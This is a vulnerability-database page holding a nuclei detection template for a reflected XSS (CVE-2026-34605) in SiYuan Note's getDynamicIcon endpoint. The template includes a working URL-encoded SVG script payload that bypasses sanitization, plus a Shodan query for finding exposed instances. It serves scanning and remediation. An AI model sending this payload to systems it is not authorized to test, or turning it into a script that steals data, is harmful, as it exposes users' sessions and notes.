Lucene search
K

SiYuan Note - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 52 Views

SiYuan Note up to 3.6.1 suffers unauthenticated reflected XSS in /api/icon/getDynamicIcon.

Related
Refs
Code
id: CVE-2026-34605

info:
  name: SiYuan Note - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.
  remediation: |
    Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.
  impact: |
    Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34605
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-34605
    epss-score: 0.00469
    epss-percentile: 0.3728
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,xss,svg

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</text><x:script xmlns:x="http://www.w3.org/2000/svg">alert(document.domain)</x:script><text>'
          - 'id="dynamic_icon_type8'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f2b3a8bcfe4f3107b209ef0a63bf6e861c46c860dfe4da88a1cb47966622c6ff02205024846ffb0d1946d470b5ca28f9fea2a7661504807c2a4b44bba7c6e60d53fd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 18:11Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1
CVSS 48.6
EPSS0.00469
SSVC
52